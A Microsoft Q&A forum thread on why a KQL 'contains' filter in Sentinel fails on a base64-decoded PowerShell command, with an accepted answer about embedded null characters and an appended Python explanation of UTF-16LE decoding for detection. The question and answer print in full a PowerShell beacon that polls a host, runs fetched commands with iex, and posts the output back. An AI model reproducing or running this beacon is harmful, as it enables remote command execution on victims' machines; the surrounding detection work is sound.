Microsoft Sentinel where clause failing for more than one character

Liam Jones 146 Reputation points
2022-10-12T16:36:22.197+00:00

I'm having difficulty searching a field for a value in KQL.

The field I am searching is produced by decoding a base64 encoded string using the built-in function base64_decode_tostring(). The string I am decoding is:

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

This string decodes to what I expect in the decodedString column:

$s='172.20.10.2:8080';$i='68079a0b-3690321d-1668dc61';$p='http://';$v=Invoke-WebRequest -UseBasicParsing -Uri $p$s/68079a0b -Headers @{"X-92d9-ab61"=$i};while ($true){$c=(Invoke-WebRequest -UseBasicParsing -Uri $p$s/3690321d -Headers @{"X-92d9-ab61"=$i}).Content;if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-WebRequest -Uri $p$s/1668dc61 -Method POST -Headers @{"X-92d9-ab61"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}

It can be seen here in the results table:

[Image: Decoded string in results]

When I try to use a | where decodedString contains "X-92d9-ab61" clause to detect the string value in the decodedString column, Sentinel says there are no results. However, I can clearly see this string in my decodedString column above.

[Image: Where clause with no results]

In fact, the where clause won't detect anything, unless it is a single character included in the decodedString column.

Why will it only detect single characters? Why will it not detect a string of more than one character?


Accepted answer
Alistair Ross 7,466 Reputation points Microsoft Employee
2022-10-13T11:35:36.097+00:00

Hi @Liam Jones

I believe there must be an issue with the string at the point it is encoded or before. When running the query below, I can see that the encoded strings are different.

    let EncodedString = "JABzAD0..."; // Removed for Brevity
    let UnencodedString = "$s='172.20.10.2:8080';$i='68079a0b-3690321d-1668dc61';$p='http://';$v=Invoke-WebRequest -UseBasicParsing -Uri $p$s/68079a0b -Headers @{\"X-92d9-ab61\"=$i};while ($true){$c=(Invoke-WebRequest -UseBasicParsing -Uri $p$s/3690321d -Headers @{\"X-92d9-ab61\"=$i}).Content;if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-WebRequest -Uri $p$s/1668dc61 -Method POST -Headers @{\"X-92d9-ab61\"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}";
    print Unencoded = base64_encode_tostring(UnencodedString)
    | extend Encoded = EncodedString

When running this query, I can see that there is a null unicode character between each visible character in the outputted string.

    let EncodedString = "JABzAD0..."; // Removed for Brevity
    let DecodedString = tostring(base64_decode_tostring(EncodedString));
    // one row per character position, then the UTF-8 bytes of each character
    print r = range(0, strlen(DecodedString), 1)
    | mv-expand r to typeof(long)
    | extend c = substring(DecodedString, r, 1)
    | extend d = to_utf8(c)

[Image: 250025-encoded.png]

I cannot explain the null characters, but we can strip them out then run your where statement on it.

    let EncodedString = "JABzAD0..."; // Removed for Brevity
    print DecodedString = tostring(base64_decode_tostring(EncodedString))
    // make_string(0) is a one-character string holding U+0000
    | extend DecodedString = replace_string(DecodedString, make_string(0), "")
    | extend l = strlen(DecodedString)
    | where DecodedString contains "X-92d9-ab61"

Hope this all helps

Alistair

    1 person found this answer helpful.
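The null characters the accepted answer observes are the high bytes of UTF-16LE. PowerShell's -EncodedCommand parameter takes the script encoded as UTF-16LE and then base64'd, and the page's own prefix "JABzAD0" decodes to the bytes 24 00 73 00 3D 00, i.e. "$s=" with a NUL after every character. KQL's base64_decode_tostring() interprets the decoded bytes as UTF-8, so each visible character in decodedString is followed by U+0000: a single-character contains still matches, a multi-character one never does. The Python below is an added example, not code from the thread; the sample PowerShell fragment and all function names are constructed here. It reproduces the failure, the null-stripping workaround from the answer, and a charset-aware decode that a detection pipeline can apply to logged encoded commands before matching an indicator such as the header name.

```python
from __future__ import annotations

import base64

# Constructed sample (not the script from the thread): a PowerShell fragment
# that begins like the page's string and contains the header name searched for.
SAMPLE_SCRIPT = "$s='host:8080';$h=@{\"X-92d9-ab61\"=$i}"
INDICATOR = "X-92d9-ab61"


def encode_as_powershell_encoded_command(script: str) -> str:
    """Encode the way PowerShell's -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def encode_as_utf8_base64(script: str) -> str:
    """Plain UTF-8 base64, for comparison with the UTF-16LE form."""
    return base64.b64encode(script.encode("utf-8")).decode("ascii")


def decode_as_utf8(b64: str) -> str:
    """Mirror what base64_decode_tostring() does: read the decoded bytes as UTF-8.

    For UTF-16LE input the NUL high bytes survive as U+0000 characters, so every
    visible character is followed by a null and multi-character matches fail.
    """
    return base64.b64decode(b64).decode("utf-8", errors="replace")


def looks_like_utf16le(raw: bytes) -> bool:
    """Heuristic: ASCII text encoded as UTF-16LE has a NUL at every odd byte offset."""
    if len(raw) < 2 or len(raw) % 2:
        return False
    high_bytes = raw[1::2]
    return high_bytes.count(0) >= 0.9 * len(high_bytes)


def decode_encoded_command(b64: str) -> tuple[str, str]:
    """Decode a logged base64 blob, choosing the charset from the byte pattern.

    Returns (text, charset): UTF-16LE when the NUL pattern is present,
    otherwise UTF-8.
    """
    raw = base64.b64decode(b64)
    if looks_like_utf16le(raw):
        return raw.decode("utf-16-le"), "utf-16-le"
    return raw.decode("utf-8", errors="replace"), "utf-8"


def strip_nulls(text: str) -> str:
    """The answer's workaround, replace_string(s, make_string(0), ""), in Python."""
    return text.replace("\x00", "")


def indicator_matches(b64: str, needle: str) -> dict:
    """Compare the three approaches on one blob: naive UTF-8, null-stripped, charset-aware."""
    naive = decode_as_utf8(b64)
    proper, charset = decode_encoded_command(b64)
    return {
        "naive_utf8": needle in naive,
        "nulls_stripped": needle in strip_nulls(naive),
        "charset_aware": needle in proper,
        "charset": charset,
    }


if __name__ == "__main__":
    blob = encode_as_powershell_encoded_command(SAMPLE_SCRIPT)
    print(blob[:8], "...")  # "JABzAD0A", the same prefix as the string in the question
    for name, hit in indicator_matches(blob, INDICATOR).items():
        print(f"{name:>15}: {hit}")
```

The charset-aware path is the one to prefer in a detection pipeline: stripping U+0000 happens to work for ASCII-only scripts, but it corrupts any non-ASCII character in a UTF-16LE payload, whereas decoding with the right charset keeps the text intact for later matching.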